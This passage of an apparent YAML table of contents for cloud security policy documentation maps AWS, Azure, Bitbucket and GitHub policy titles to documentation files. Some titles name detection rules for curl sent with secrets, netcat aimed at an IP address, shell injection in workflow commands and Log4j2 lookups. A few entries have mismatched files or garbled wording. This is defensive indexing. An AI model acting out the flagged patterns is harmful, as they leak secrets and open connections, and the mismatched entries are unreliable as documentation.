SSL configured + file: ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc + - name: AWS Elasticache security groups are not defined + file: ensure-aws-elasticache-security-groups-are-defined.adoc + - name: AWS Elasticsearch uses the default security group + file: ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc + - name: AWS ELB Policy uses some unsecure protocols + file: ensure-aws-elb-policy-uses-only-secure-protocols.adoc + - name: AWS NACL allows ingress from 0.0.0.0/0 to port 20 + file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc + - name: AWS NACL allows ingress from 0.0.0.0/0 to port 21 + file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc + - name: AWS NACL allows ingress from 0.0.0.0/0 to port 22 + file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc + - name: AWS NACL allows ingress from 0.0.0.0/0 to port 3389 + file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc + - name: AWS NAT Gateways are not utilized for the default route + file: ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc + - name: AWS RDS security groups are not defined + file: ensure-aws-rds-security-groups-are-defined.adoc + - name: AWS route table with VPC peering overly permissive to all traffic + file: ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc + - name: AWS Security Group allows all traffic on all ports + file: ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc + - name: AWS security groups allow ingress from 0.0.0.0/0 to port 80 + file: ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc + - name: Default VPC is planned to be provisioned + file: ensure-no-default-vpc-is-planned-to-be-provisioned.adoc + - name: Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2) + file: ensure-public-api-gateway-are-protected-by-waf.adoc + - name: AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2) + file: ensure-public-facing-alb-are-protected-by-waf.adoc + - name: Redshift is deployed outside of a VPC + file: ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc + - name: ALB does not drop HTTP headers + file: ensure-that-alb-drops-http-headers.adoc + - name: ALB does not redirect HTTP requests into HTTPS ones + file: ensure-that-alb-redirects-http-requests-into-https-ones.adoc + - name: Not all EIP addresses allocated to a VPC are attached to EC2 instances + file: ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc + - name: Not all NACL are attached to subnets + file: ensure-that-all-nacl-are-attached-to-subnets.adoc + - name: Amazon EMR clusters' security groups are open to the world + file: ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc + - name: AWS Redshift cluster is publicly accessible + file: ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc + - name: Auto scaling groups associated with a load balancer do not use elastic load balancing health checks + file: ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc + - name: AWS SageMaker notebook instance configured with direct internet access feature + file: ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc + - name: AWS Elasticsearch is not configured inside a VPC + file: ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc + - name: AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled + file: ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc + - name: Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled + file: ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc + - name: Security Groups are not attached to EC2 instances or ENIs + file: ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc + - name: VPC endpoint service is not configured for manual acceptance + file: ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc + - name: Ensure Transfer Server is exposed publicly. + file: ensure-transfer-server-is-not-exposed-publicly.adoc + - name: AWS VPC subnets should not allow automatic public IP assignment + file: ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc + - name: WAF enables message lookup in Log4j2 + file: ensure-waf-prevents-message-lookup-in-log4j2.adoc + - name: AWS Security Group allows all traffic on SSH port (22) + file: networking-1-port-security.adoc + - name: AWS Security Group allows all traffic on RDP port (3389) + file: networking-2.adoc + - name: AWS Elastic Load Balancer v2 (ELBv2) listener that allow connection requests over HTTP + file: networking-29.adoc + - name: Not every Security Group rule has a description + file: networking-31.adoc + - name: Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS + file: networking-32.adoc + - name: AWS Default Security Group does not restrict all traffic + file: networking-4.adoc + - name: S3 Bucket does not have public access blocks + file: s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc +- name: Public Policies + dir: public-policies + topics: + - name: Public Policies + file: public-policies.adoc + - name: AWS Private ECR repository policy is overly permissive + file: public-1-ecr-repositories-not-public.adoc + - name: AWS MQ is publicly accessible + file: public-11.adoc + - name: AWS EC2 instances with public IP and associated with security groups have Internet access + file: public-12.adoc + - name: DMS replication instance should be publicly accessible + file: public-13.adoc + - name: AWS RDS database instance is publicly accessible + file: public-2.adoc + - name: AWS API gateway methods are publicly accessible + file: public-6-api-gateway-authorizer-set.adoc + - name: AWS Redshift clusters should not be publicly accessible + file: public-9.adoc +- name: S3 Policies + dir: s3-policies + topics: + - name: S3 Policies + file: s3-policies.adoc + - name: AWS S3 Buckets has block public access setting disabled + file: bc-aws-s3-19.adoc + - name: AWS S3 Bucket BlockPublicPolicy is not set to True + file: bc-aws-s3-20.adoc + - name: AWS S3 bucket IgnorePublicAcls is not set to True + file: bc-aws-s3-21.adoc + - name: AWS S3 bucket RestrictPublicBucket is not set to True + file: bc-aws-s3-22.adoc + - name: AWS S3 bucket policy overly permissive to any principal + file: bc-aws-s3-23.adoc + - name: AWS S3 bucket is not configured with MFA Delete + file: bc-aws-s3-24.adoc + - name: AWS S3 bucket ACL grants READ permission to everyone + file: s3-1-acl-read-permissions-everyone.adoc + - name: AWS Access logging not enabled on S3 buckets + file: s3-13-enable-logging.adoc + - name: AWS S3 buckets do not have server side encryption + file: s3-14-data-encrypted-at-rest.adoc + - name: AWS S3 Object Versioning is disabled + file: s3-16-enable-versioning.adoc + - name: AWS S3 Bucket has an ACL defined which allows public WRITE access + file: s3-2-acl-write-permissions-everyone.adoc +- name: Secrets Policies + dir: secrets-policies + topics: + - name: Secrets Policies + file: secrets-policies.adoc + - name: EC2 user data exposes secrets + file: bc-aws-secrets-1.adoc + - name: Lambda function's environment variables expose secrets + file: bc-aws-secrets-3.adoc + - name: AWS access keys and secrets are hard coded in infrastructure + file: bc-aws-secrets-5.adoc +- name: AWS Serverless Policies + dir: aws-serverless-policies + topics: + - name: AWS Serverless Policies + file: aws-serverless-policies.adoc + - name: AWS Lambda functions with tracing not enabled + file: bc-aws-serverless-4.adoc + - name: AWS Lambda encryption settings environmental variable is not set properly + file: bc-aws-serverless-5.adoc +--- +kind: chapter +name: Azure Policies +dir: azure-policies +topics: +- name: Azure Policies + file: azure-policies.adoc +- name: Azure General Policies + dir: azure-general-policies + topics: + - name: Azure General Policies + file: azure-general-policies.adoc + - name: Azure VM data disk is not encrypted with ADE/CMK + file: bc-azr-general-1.adoc + - name: Azure Linux scale set does not use an SSH key + file: bc-azr-general-13.adoc + - name: Virtual Machine extensions are installed + file: bc-azr-general-14.adoc + - name: Azure App Service Web app authentication is off + file: bc-azr-general-2.adoc + - name: Azure Microsoft Defender for Cloud security contact phone number is not set + file: bc-azr-general-3.adoc + - name: Azure Microsoft Defender for Cloud email notification for subscription owner is not set + file: bc-azr-general-5.adoc + - name: Azure SQL Server threat detection alerts are not enabled for all threat types + file: bc-azr-general-6.adoc + - name: Azure SQL server send alerts to field value is not set + file: bc-azr-general-7.adoc + - name: Azure SQL Databases with disabled Email service and co-administrators for Threat Detection + file: bc-azr-general-8.adoc + - name: Azure PostgreSQL Database Server 'Allow access to Azure services' enabled + file: ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc + - name: Azure Built-in logging for Azure function app is disabled + file: ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc + - name: Azure Client Certificates are not enforced for API management + file: ensure-azure-client-certificates-are-enforced-for-api-management.adoc + - name: Azure Cognitive Services does not Customer Managed Keys (CMKs) for encryption + file: ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc + - name: Azure Data exfiltration protection for Azure Synapse workspace is disabled + file: ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc + - name: Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0 + file: ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc + - name: Azure PostgreSQL Flexible Server does not enable geo-redundant backups + file: ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc + - name: Azure resources that support tags do not have tags + file: ensure-azure-resources-that-support-tags-have-tags.adoc + - name: Azure SQL Server does not have default auditing policy configured + file: ensure-azure-sql-server-has-default-auditing-policy-configured.adoc + - name: Azure Virtual machine enables password authentication + file: ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc + - name: Storage Account name does not follow naming rules + file: ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc + - name: Azure App Services FTP deployment is All allowed + file: ensure-ftp-deployments-are-disabled.adoc + - name: MSSQL is not using the latest version of TLS encryption + file: ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc + - name: MySQL is not using the latest version of TLS encryption + file: ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc + - name: Azure Microsoft Defender for Cloud Defender plans is set to Off + file: ensure-standard-pricing-tier-is-selected.adoc + - name: Storage for critical data are not encrypted with Customer Managed Key + file: ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc + - name: Active Directory is not used for authentication for Service Fabric + file: ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc + - name: App services do not use Azure files + file: ensure-that-app-services-use-azure-files.adoc + - name: Automatic OS image patching is disabled for Virtual Machine scale sets + file: ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc + - name: Azure Automation account variables are not encrypted + file: ensure-that-automation-account-variables-are-encrypted.adoc + - name: Azure SQL servers which doesn't have Azure Active Directory admin configured + file: ensure-that-azure-active-directory-admin-is-configured.adoc + - name: Azure Batch account does not use key vault to encrypt data + file: ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc + - name: Azure Data Explorer encryption at rest does not use a customer-managed key + file: ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc + - name: Azure Data Explorer does not use disk encryption + file: ensure-that-azure-data-explorer-uses-disk-encryption.adoc + - name: Azure Data Explorer does not use double encryption + file: ensure-that-azure-data-explorer-uses-double-encryption.adoc + - name: Azure data factories are not encrypted with a customer-managed key + file: ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc + - name: Azure Data Factory does not use Git repository for source control + file: ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for App Service + file: ensure-that-azure-defender-is-set-to-on-for-app-service.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases + file: ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Container Registries + file: ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Key Vault + file: ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc + - name: Azure Security Center Defender set to Off for Kubernetes + file: ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Servers + file: ensure-that-azure-defender-is-set-to-on-for-servers.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines + file: ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Storage + file: ensure-that-azure-defender-is-set-to-on-for-storage.adoc + - name: CORS allows resource to access app services + file: ensure-that-cors-disallows-every-resource-to-access-app-services.adoc + - name: CORS allows resources to access function apps + file: ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc + - name: Cosmos DB Accounts do not have CMKs encrypting data at rest + file: ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc + - name: Unencrypted Data Lake Store accounts + file: ensure-that-data-lake-store-accounts-enables-encryption.adoc + - name: Azure Function App authentication is off + file: ensure-that-function-apps-enables-authentication.adoc + - name: Azure Function App doesn't use HTTP 2.0 + file: ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc + - name: Azure App Service Web app does not use latest Java version + file: ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: Azure Key Vault Purge protection is not enabled + file: ensure-that-key-vault-enables-purge-protection.adoc + - name: Key vault does not enable soft-delete + file: ensure-that-key-vault-enables-soft-delete.adoc + - name: Key vault key is not backed by HSM + file: ensure-that-key-vault-key-is-backed-by-hsm.adoc + - name: Key vault secrets do not have content_type set + file: ensure-that-key-vault-secrets-have-content-type-set.adoc + - name: Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption + file: ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc + - name: Azure App Service Web app does not have a Managed Service Identity + file: ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc + - name: MariaDB server does not enable geo-redundant backups + file: ensure-that-mariadb-server-enables-geo-redundant-backups.adoc + - name: Microsoft Antimalware is not configured to automatically update Virtual Machines + file: ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc + - name: My SQL server disables geo-redundant backups + file: ensure-that-my-sql-server-enables-geo-redundant-backups.adoc + - name: My SQL server does not enable Threat Detection policy + file: ensure-that-my-sql-server-enables-threat-detection-policy.adoc + - name: MySQL server does not enable customer-managed key for encryption + file: ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc + - name: Azure App Service Web app doesn't use latest .Net framework version + file: ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc + - name: Azure App Service Web app does not use latest PHP version + file: ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: PostgreSQL server does not enable customer-managed key for encryption + file: ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc + - name: PostgreSQL server enables geo-redundant backups + file: ensure-that-postgresql-server-enables-geo-redundant-backups.adoc + - name: MySQL server disables infrastructure encryption + file: ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc + - name: PostgreSQL server does not enable infrastructure encryption + file: ensure-that-postgresql-server-enables-infrastructure-encryption.adoc + - name: PostgreSQL server does not enable Threat Detection policy + file: ensure-that-postgresql-server-enables-threat-detection-policy.adoc + - name: Azure App Service Web app does not use latest Python version + file: ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: Azure App Services Remote debugging is enabled + file: ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc + - name: Azure Microsoft Defender for Cloud security alert email notifications is not set + file: ensure-that-security-contact-emails-is-set.adoc + - name: Service Fabric does not use three levels of protection available + file: ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc + - name: Azure SQL server Defender setting is set to Off + file: ensure-that-sql-servers-enables-data-security-policy.adoc + - name: Azure Storage account Encryption CMKs Disabled + file: ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc + - name: Unattached disks are not encrypted + file: ensure-that-unattached-disks-are-encrypted.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled + file: ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled + file: ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured + file: ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc + - name: Virtual machine scale sets do not have encryption at host enabled + file: ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc + - name: Virtual Machines are not backed up using Azure Backup + file: ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc + - name: Azure Linux and Windows Virtual Machines does not utilize Managed Disks + file: ensure-that-virtual-machines-use-managed-disks.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) is disabled + file: ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc + - name: Azure Key Vault is not recoverable + file: ensure-the-key-vault-is-recoverable.adoc + - name: Azure Virtual Machines does not utilise Managed Disks + file: ensure-virtual-machines-are-utilizing-managed-disks.adoc + - name: Azure Key Vault Keys does not have expiration date + file: set-an-expiration-date-on-all-keys.adoc +- name: Azure IAM Policies + dir: azure-iam-policies + topics: + - name: Azure IAM Policies + file: azure-iam-policies.adoc + - name: App Service is not registered with an Azure Active Directory account + file: bc-azr-iam-1.adoc + - name: Azure subscriptions with custom roles does not have minimum permissions + file: do-not-create-custom-subscription-owner-roles.adoc + - name: Azure CosmosDB does not have Local Authentication disabled + file: ensure-azure-acr-admin-account-is-disabled.adoc + - name: Azure ACR enables anonymous image pulling + file: ensure-azure-acr-disables-anonymous-image-pulling.adoc + - name: Azure CosmosDB does not have Local Authentication disabled + file: ensure-azure-cosmosdb-has-local-authentication-disabled.adoc + - name: Azure Kubernetes Service (AKS) local admin account is enabled + file: ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc + - name: Azure Machine Learning Compute Cluster Local Authentication is enabled + file: ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc + - name: Azure Windows VM does not enable encryption + file: ensure-azure-windows-vm-enables-encryption.adoc +- name: Azure Kubernetes Policies + dir: azure-kubernetes-policies + topics: + - name: Azure Kubernetes Policies + file: azure-kubernetes-policies.adoc + - name: Azure AKS cluster monitoring not enabled + file: bc-azr-kubernetes-1.adoc + - name: Azure AKS enable role-based access control (RBAC) not enforced + file: bc-azr-kubernetes-2.adoc + - name: AKS API server does not define authorized IP ranges + file: bc-azr-kubernetes-3.adoc + - name: Azure AKS cluster network policies are not enforced + file: bc-azr-kubernetes-4.adoc + - name: Kubernetes dashboard is not disabled + file: bc-azr-kubernetes-5.adoc + - name: AKS is not enabled for private clusters + file: ensure-that-aks-enables-private-clusters.adoc + - name: AKS does not use Azure policies add-on + file: ensure-that-aks-uses-azure-policies-add-on.adoc + - name: AKS does not use disk encryption set + file: ensure-that-aks-uses-disk-encryption-set.adoc +- name: Azure Logging Policies + dir: azure-logging-policies + topics: + - name: Azure Logging Policies + file: azure-logging-policies.adoc + - name: Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days + file: bc-azr-logging-1.adoc + - name: Azure SQL Server auditing policy is disabled + file: bc-azr-logging-2.adoc + - name: Azure SQL Server audit log retention is not greater than 90 days + file: bc-azr-logging-3.adoc + - name: Azure storage account logging for queues is disabled + file: enable-requests-on-storage-logging-for-queue-service.adoc + - name: Azure Monitor log profile does not capture all activities + file: ensure-audit-profile-captures-all-activities.adoc + - name: Azure storage account logging setting for blobs is disabled + file: ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc + - name: Azure storage account logging setting for tables is disabled + file: ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc + - name: App service does not enable failed request tracing + file: ensure-that-app-service-enables-failed-request-tracing.adoc + - name: App service does not enable HTTP logging + file: ensure-that-app-service-enables-http-logging.adoc + - name: Azure Storage account container storing activity logs is publicly accessible + file: ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc + - name: Activity Log Retention should not be set to less than 365 days + file: set-activity-log-retention-to-365-days-or-greater.adoc + - name: App service disables detailed error messages + file: tbdensure-that-app-service-enables-detailed-error-messages.adoc +- name: Azure Networking Policies + dir: azure-networking-policies + topics: + - name: Azure Networking Policies + file: azure-networking-policies.adoc + - name: Azure instance does not authenticate using SSH keys + file: bc-azr-networking-1.adoc + - name: Azure PostgreSQL database server with SSL connection disabled + file: bc-azr-networking-10.adoc + - name: Azure PostgreSQL database server with log checkpoints parameter disabled + file: bc-azr-networking-11.adoc + - name: Azure PostgreSQL database server with log connections parameter disabled + file: bc-azr-networking-12.adoc + - name: Azure PostgreSQL database server with connection throttling parameter is disabled + file: bc-azr-networking-13.adoc + - name: Azure MariaDB database server with SSL connection disabled + file: bc-azr-networking-17.adoc + - name: Azure RDP Internet access is not restricted + file: bc-azr-networking-2.adoc + - name: Azure Network Security Group allows all traffic on SSH (port 22) + file: bc-azr-networking-3.adoc + - name: Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0 + file: bc-azr-networking-4.adoc + - name: Azure App Service Web app doesn't redirect HTTP to HTTPS + file: bc-azr-networking-5.adoc + - name: Azure App Service Web app doesn't use latest TLS version + file: bc-azr-networking-6.adoc + - name: Azure App Service Web app client certificate is disabled + file: bc-azr-networking-7.adoc + - name: Azure App Service Web app doesn't use HTTP 2.0 + file: bc-azr-networking-8.adoc + - name: Azure MySQL Database Server SSL connection is disabled + file: bc-azr-networking-9.adoc + - name: Azure Storage Account 'Trusted Microsoft Services' access not enabled + file: enable-trusted-microsoft-services-for-storage-account-access.adoc + - name: Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled + file: ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc + - name: Azure Container registries Public access to All networks is enabled + file: ensure-azure-acr-is-set-to-disable-public-networking.adoc + - name: Azure Redis Cache does not use the latest version of TLS encryption + file: ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc + - name: Azure App service slot does not have debugging disabled + file: ensure-azure-app-service-slot-has-debugging-disabled.adoc + - name: Azure App's service slot does not use the latest version of TLS encryption + file: ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Cognitive Services accounts enable public network access + file: ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc + - name: Azure Databricks workspace is public + file: ensure-azure-databricks-workspace-is-not-public.adoc + - name: Azure Function app does not use the latest version of TLS encryption + file: ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure HTTP (port 80) access from the internet is not restricted + file: ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc + - name: Azure Machine Learning Workspace is publicly accessible + file: ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc + - name: Azure PostgreSQL does not use the latest version of TLS encryption + file: ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Redis Cache does not use the latest version of TLS encryption + file: ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Spring Cloud API Portal is not enabled for HTTPS + file: ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc + - name: Azure Spring Cloud API Portal Public Access Is Enabled + file: ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc + - name: Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot + file: ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc + - name: Cosmos DB accounts do not have restricted access + file: ensure-cosmos-db-accounts-have-restricted-access.adoc + - name: Azure Front Door Web application firewall (WAF) policy rule for Remote Command Execution is disabled + file: ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc + - name: public network access enabled' is not set to 'False' for mySQL servers + file: ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc + - name: API management services do not use virtual networks + file: ensure-that-api-management-services-uses-virtual-networks.adoc + - name: Azure application gateway does not have WAF enabled + file: ensure-that-application-gateway-enables-waf.adoc + - name: Application gateway does not use WAF in Detection or Prevention modes + file: ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc + - name: Azure cache for Redis has public network access enabled + file: ensure-that-azure-cache-for-redis-disables-public-network-access.adoc + - name: Azure cognitive search does not disable public network access + file: ensure-that-azure-cognitive-search-disables-public-network-access.adoc + - name: Azure container container group is not deployed into a virtual network + file: ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc + - name: Azure Cosmos DB enables public network access + file: ensure-that-azure-cosmos-db-disables-public-network-access.adoc + - name: Azure Data Factory (V2) configured with overly permissive network access + file: ensure-that-azure-data-factory-public-network-access-is-disabled.adoc + - name: Azure Event Grid domain public network access is enabled + file: ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc + - name: Azure file sync enables public network access + file: ensure-that-azure-file-sync-disables-public-network-access.adoc + - name: Azure Front Door does not have the Azure Web application firewall (WAF) enabled + file: ensure-that-azure-front-door-enables-waf.adoc + - name: Azure front door does not use WAF in Detection or Prevention modes + file: ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc + - name: Azure IoT Hub enables public network access + file: ensure-that-azure-iot-hub-disables-public-network-access.adoc + - name: Azure Synapse Workspaces do not enable managed virtual networks + file: ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc + - name: Azure Synapse workspaces have IP firewall rules attached + file: ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc + - name: Azure Function App doesn't redirect HTTP to HTTPS + file: ensure-that-function-apps-is-only-accessible-over-https.adoc + - name: Key vault does not allow firewall rules settings + file: ensure-that-key-vault-allows-firewall-rules-settings.adoc + - name: Azure Virtual machine NIC has IP forwarding enabled + file: ensure-that-network-interfaces-disable-ip-forwarding.adoc + - name: Network interfaces use public IPs + file: ensure-that-network-interfaces-dont-use-public-ips.adoc + - name: Not only SSL are enabled for cache for Redis + file: ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc + - name: PostgreSQL server does not disable public network access + file: ensure-that-postgresql-server-disables-public-network-access.adoc + - name: SQL Server is enabled for public network access + file: ensure-that-sql-server-disables-public-network-access.adoc + - name: Storage Accounts without Secure transfer enabled + file: ensure-that-storage-account-enables-secure-transfer.adoc + - name: Azure storage account does allow public access + file: ensure-that-storage-accounts-disallow-public-access.adoc + - name: Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol + file: ensure-that-udp-services-are-restricted-from-the-internet.adoc + - name: Azure Storage Account default network access is set to 'Allow' + file: set-default-network-access-rule-for-storage-accounts-to-deny.adoc + - name: Azure storage account has a blob container that is publicly accessible + file: set-public-access-level-to-private-for-blob-containers.adoc +- name: Azure Secrets Policies + dir: azure-secrets-policies + topics: + - name: Azure Secrets Policies + file: azure-secrets-policies.adoc + - name: Secrets are exposed in Azure VM customData + file: bc-azr-secrets-2.adoc + - name: Azure Key Vault secrets does not have expiration date + file: set-an-expiration-date-on-all-secrets.adoc +- name: Azure Storage Policies + dir: azure-storage-policies + topics: + - name: Azure Storage Policies + file: azure-storage-policies.adoc + - name: Azure Storage Account using insecure TLS version + file: bc-azr-storage-2.adoc + - name: Azure Cosmos DB key based authentication is enabled + file: bc-azr-storage-4.adoc + - name: Storage Account name does not follow naming rules + file: ensure-storage-accounts-adhere-to-the-naming-rules.adoc +- name: Public Policies 1 + dir: public-policies-1 + topics: + - name: Public Policies 1 + file: public-policies-1.adoc + - name: MariaDB servers do not have public network access enabled set to False + file: bc-azr-public-1.adoc +--- +kind: chapter +name: Build Integrity Policies +dir: build-integrity-policies +topics: +- name: Build Integrity Policies + file: build-integrity-policies.adoc +- name: Bitbucket Policies + dir: bitbucket-policies + topics: + - name: Bitbucket Policies + file: bitbucket-policies.adoc + - name: BitBucket pull requests require less than approvals + file: merge-requests-should-require-at-least-2-approvals-1.adoc +- name: Github Actions Policies + dir: github-actions-policies + topics: + - name: GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true + file: ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc + - name: GitHub Actions Run commands are vulnerable to shell injection + file: ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc + - name: GitHub Actions artifact build do not have SBOM attestation in pipeline + file: found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc + - name: Github Actions Policies + file: github-actions-policies.adoc + - name: GitHub Actions artifact build do not have cosign - sign execution in pipeline + file: no-evidence-of-signing.adoc + - name: GitHub Actions curl is being with secrets + file: suspicious-use-of-curl-with-secrets.adoc + - name: GitHub Actions Netcat is being used with IP address + file: suspicious-use-of-netcat-with-ip-address.adoc + - name: GitHub Actions contain workflow_dispatch inputs parameters + file: github-actions-contain-workflow-dispatch-inputs-parameters.adoc +- name: Github Policies + dir: github-policies + topics: + - name: Github Policies + file: github-policies.adoc + - name: GitHub repository has less than 2 admins + file: ensure-2-admins-are-set-for-each-repository.adoc + - name: GitHub branch protection rules are not enforced on administrators + file: ensure-branch-protection-rules-are-enforced-on-administrators.adoc + - name: GitHub Actions Environment Secrets are not encrypted + file: ensure-github-actions-secrets-are-encrypted.adoc + - name: GitHub branch protection does not dismiss stale reviews + file: ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc + - name: GitHub branch protection does not require code owner reviews + file: ensure-github-branch-protection-requires-codeowner-reviews.adoc + - name: GitHub branch protection does not require status checks + file: ensure-github-branch-protection-requires-conversation-resolution.adoc + - name: GitHub branch protection does not require push restrictions + file: ensure-github-branch-protection-requires-push-restrictions.adoc + - name: GitHub branch protection does not require status checks + file: ensure-github-branch-protection-requires-status-checks.adoc + - name: GitHub branch protection does not restrict who can dismiss a PR + file: ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc + - name: GitHub branch protection rules allow branch deletions + file: ensure-github-branch-protection-rules-does-not-allow-deletions.adoc + - name: GitHub branch protection rules do not require linear history + file: ensure-github-branch-protection-rules-requires-linear-history.adoc + - name: GitHub merge requests should require at least 2 approvals + file: ensure-github-branch-protection-rules-requires-signed-commits.adoc + - name: 